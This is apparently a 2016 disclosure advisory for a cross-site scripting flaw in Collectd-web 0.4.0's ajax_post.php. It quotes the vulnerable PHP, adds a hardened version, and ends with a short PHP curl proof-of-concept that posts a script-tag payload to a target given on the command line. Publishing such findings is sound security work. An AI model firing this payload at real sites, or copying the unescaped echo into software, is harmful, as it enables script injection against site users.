`Title -Collectd-web XSS
# Exploit Title : XSS Vulnerability in Collectd-web
# Date: Sun May 22 11:55:36 EDT 2016
# Reported Date : Sun May 22 11:55:36 EDT 2016
# Vendor Homepage: https://collectd.org/wiki/index.php/Collectd-web
# Version: 0.4.0
# Software Link: https://github.com/httpdss/collectd-web
# Solution : https://github.com/httpdss/collectd-web/issues/77
# Exploit Author :MehrdadLinux
# Tested On : Linux Platforms.
# Facebook : https://facebook.com/MehrdadLinux
# Twitter : http://twitter.com/MehrdadLinux
# Detailed Vul: http://blog.opsnit.com
===========================================================================================
1. VULNERABILITY
-------------------------
XSS Vulnerability in Collectd-web 0.4.0 – January 2016
2. BACKGROUND
-------------------------
Collectd-web is a web-based front-end for RRD data collected by collectd.
It is based on contrib/collection.cgi, a demo CGI script included in
collectd.
With strong emphasis on the usage of Jquery and JqueryUI, Collectd-Web
manages to give sysadmins a nice yet functional interface.
3. DESCRIPTION
-------------------------
XSS in ajax_post.php
https://github.com/httpdss/collectd-web/blob/master/media/jqtouch/demos/main/ajax_post.php
1 <?php
2 $theaters = array("Los Gatos Cinema","Cinelux Plaza Theatre","Camera 7");
3 $movies = array("Transformers","Knocked Up","Live Free Die Hard");
4 $title = "-";
5 if ($_POST["zip"]) {
6 $title = "Zip " . $_POST['zip'];
7 } else {
8 $title = $_POST['movie'];
9 }
10 ?>
11 <div>
12 <div class="toolbar">
13 <h1><?php echo $title ?></h1>
14 <a href="#" class="button back">Back</a>
15 </div>
16 <ul class="edgetoedge">
17 <?php
18 if ($_POST['zip']) {
19 foreach ($theaters as $theater) {
20 echo '<li><a href="#theater">' . $theater . '</a></li>';
21 }
22 } else {
23 foreach ($movies as $movie) {
24 echo '<li><a href="#movie">' . $movie . '</a></li>';
25 }
26 }
27 ?>
28 </ul>
29 <form action="ajax_post.php" method="POST">
30 <ul class="rounded">
31 <li><input type="text" name="zip" value="" placeholder="Live post event test" /></li>
32 </ul>
33 <a style="margin:0 10px;color:rgba(0,0,0,.9)" href="#" class="submit whiteButton">Submit</a>
34
35 </form>
36 </div>
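The vulnerability is at line 5, in the zip POST parameter: the value is copied into $title (line 6) and echoed at line 13 without HTML escaping. The movie parameter (line 8) reaches the same echo.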
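A hardened form of lines 5 to 13, escaping at output and treating both POST fields as untrusted. This is an added example, not code from the advisory or the collectd-web project's own fix; the helper names h() and build_title(), the ZIP allow-list pattern and the "Zip (invalid)" fallback are assumptions.

```php
<?php
// Added example (not the project's patch). Requires PHP 7.0 or later.

/** HTML-escape a value for element content or a quoted attribute. */
function h(string $value): string
{
    // ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid
    // UTF-8 sequences instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Build the page title from request data (hypothetical helper). */
function build_title(array $post): string
{
    // Accept only string values: a missing key or an array such as
    // zip[]=x is treated as empty rather than passed through.
    $zip   = isset($post['zip'])   && is_string($post['zip'])   ? $post['zip']   : '';
    $movie = isset($post['movie']) && is_string($post['movie']) ? $post['movie'] : '';

    if ($zip !== '') {
        // Assumption: the demo expects a US ZIP code (5 digits, optional +4).
        return preg_match('/^\d{5}(-\d{4})?$/', $zip) === 1
            ? 'Zip ' . $zip
            : 'Zip (invalid)';
    }
    return $movie !== '' ? $movie : '-';
}

$title = build_title($_POST);
?>
<div>
    <div class="toolbar">
        <!-- Escaping happens here, at the point of output. -->
        <h1><?php echo h($title); ?></h1>
        <a href="#" class="button back">Back</a>
    </div>
</div>
```

The allow-list narrows what zip may contain, but the htmlspecialchars() call at the echo is what closes the injection for both parameters.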
====================================Exploit=========================================
<?php
$yourtarget = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$yourtarget/collectd-web/media/jqtouch/demos/main/ajax_post.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
// The inner double quote is escaped so the PHP string literal stays intact.
curl_setopt($ch, CURLOPT_POSTFIELDS,
"movie=></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))</SCRIPT>");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
====================================Exploit=========================================
4. DISCOVERED BY
-------------------------
The vulnerability has been discovered by Mehrdad Abbasi (MehrdadLinux) and
Hossein Masoudi (cs.masoudi)
email : MehrdadLinux (at) gmail (dot) com
http://opsnit.com
5. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.
`